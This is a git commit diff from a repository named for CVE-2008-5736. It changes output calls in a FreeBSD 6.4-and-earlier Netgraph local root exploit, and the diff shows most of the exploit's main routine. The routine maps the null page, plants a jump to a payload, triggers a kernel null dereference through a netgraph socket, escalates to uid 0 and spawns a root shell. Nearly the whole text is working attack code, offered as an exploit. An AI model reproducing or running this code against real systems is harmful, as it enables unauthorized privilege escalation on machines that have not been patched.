diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 20:06:46 -0500 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-27 20:06:46 -0500 |
commit | 41ee184ac9c9ad06221abd3464f1eba81f71167f (patch) | |
tree | 0d3654d7b090585f9d7c028f002428a9aab696e2 | |
parent | Get out of jail by copying fds from pid 1. (diff) | |
download | CVE-2008-5736-41ee184ac9c9ad06221abd3464f1eba81f71167f.tar.xz CVE-2008-5736-41ee184ac9c9ad06221abd3464f1eba81f71167f.zip |
Print to stdout, not stderr.
-rw-r--r-- | current-thread-exec.c | 22 |
1 files changed, 11 insertions, 11 deletions
diff --git a/current-thread-exec.c b/current-thread-exec.c index 373f74f..7661fb3 100644 --- a/current-thread-exec.c +++ b/current-thread-exec.c @@ -43,45 +43,45 @@ int root(void) int main(int argc, char *argv[]) { - fprintf(stderr, "~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n"); - fprintf(stderr, "~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n"); - fprintf(stderr, "~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n"); + printf("~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n"); + printf("~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n"); + printf("~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n"); - fprintf(stderr, "[+] mmapping null page\n"); + printf("[+] mmapping null page\n"); if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) { perror("[-] mmap failed"); return -1; } - fprintf(stderr, "[+] adding jmp to pwnage in null page\n"); + printf("[+] adding jmp to pwnage in null page\n"); *(char*)0x0 = 0x90; *(char*)0x1 = 0xe9; *(unsigned long*)0x2 = (unsigned long)&root; - fprintf(stderr, "[+] opening netgraph socket\n"); + printf("[+] opening netgraph socket\n"); int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if (s < 0) { perror("[-] failed to open netgraph socket"); return -1; } - fprintf(stderr, "[+] triggering null dereference\n"); + printf("[+] triggering null dereference\n"); shutdown(s, SHUT_RDWR); if (!got_root) { - fprintf(stderr, "[-] failed to trigger pwnage\n"); + printf("[-] failed to trigger pwnage\n"); return -1; } - fprintf(stderr, "[+] elevating permissions\n"); + printf("[+] elevating permissions\n"); setuid(0); setgid(0); if (getuid() != 0) { - fprintf(stderr, "[-] failed to get root\n"); + printf("[-] failed to get root\n"); return -1; } - fprintf(stderr, "[+] got root!\n"); + printf("[+] got root!\n"); execl("/bin/sh", "sh", NULL); return 0; |